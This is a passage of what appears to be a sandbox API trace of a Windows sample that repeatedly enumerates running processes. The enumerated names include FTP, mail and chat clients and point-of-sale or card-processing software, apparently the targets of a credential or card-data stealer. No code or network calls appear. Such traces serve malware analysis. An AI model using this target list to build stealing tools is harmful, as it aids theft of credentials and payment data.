pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0297.209] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0297.211] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0297.213] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0297.216] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0297.218] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0297.220] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0297.222] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0297.224] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0297.226] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0297.228] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0297.357] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0297.360] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0297.362] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0297.364] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0297.366] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0297.368] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0297.371] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0297.372] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0297.374] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0297.376] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0297.378] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0297.380] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0297.382] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0297.384] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0297.388] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0297.390] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0297.393] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0297.395] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0297.397] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0297.399] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0297.496] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0297.498] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0297.501] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0297.503] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0297.506] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0297.508] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0297.513] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0297.515] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0297.517] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0297.520] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0297.522] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0297.525] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0297.527] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0297.529] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0297.531] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0297.533] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0297.534] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0297.536] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0297.539] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0297.541] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0297.689] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0297.691] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0297.693] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0297.695] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0297.696] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0297.699] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0297.701] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0297.703] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0297.705] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0297.708] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0297.710] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0297.712] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0297.715] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0297.717] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.719] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.721] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0297.723] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0297.726] CloseHandle (hObject=0x227c) returned 1 [0297.726] Sleep (dwMilliseconds=0x64) [0297.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0297.928] Process32First (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.930] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.931] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.934] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.936] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.937] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.939] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.941] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.942] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.944] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.945] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.947] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.950] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.951] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.953] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.955] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.956] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, 